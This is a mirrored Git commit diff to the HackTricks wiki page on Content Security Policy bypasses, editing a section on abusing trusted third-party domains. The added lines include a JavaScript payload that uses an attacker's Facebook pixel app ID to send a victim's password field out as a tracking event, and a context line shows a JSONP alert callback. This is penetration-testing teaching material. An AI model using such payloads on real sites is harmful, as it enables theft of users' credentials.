Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add new CSP bypasses through third-parties

Browse source
This commit is contained in:
Felipe Molina 2023-10-26 18:20:03 +01:00
parent 121d793ce0
commit 548aed19f8
1 changed files with 4 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -288,7 +288,7 @@ https://www.youtube.com/oembed?callback=alert;
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
### Third Party Abuses
As described in the (following post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses], there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
As described in the (following post)[https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses], there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
| Entity | Allowed Domain | Capabilities |
|--------|----------------|--------------|
@ -326,13 +326,13 @@ You should be able to exfiltrate data, similarly as it has always be done with (
Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
```JavaScript
fbq('init', '1179785999289471');
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Secret ingredient is: '"+document.getElementById('user-password').innerText+"'"
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
As for the other third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously referred (blog post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses] for additional explanations.
As for the other seven third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously (blog post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses] for additional explanations about other third-party abuses.
### Folder path bypass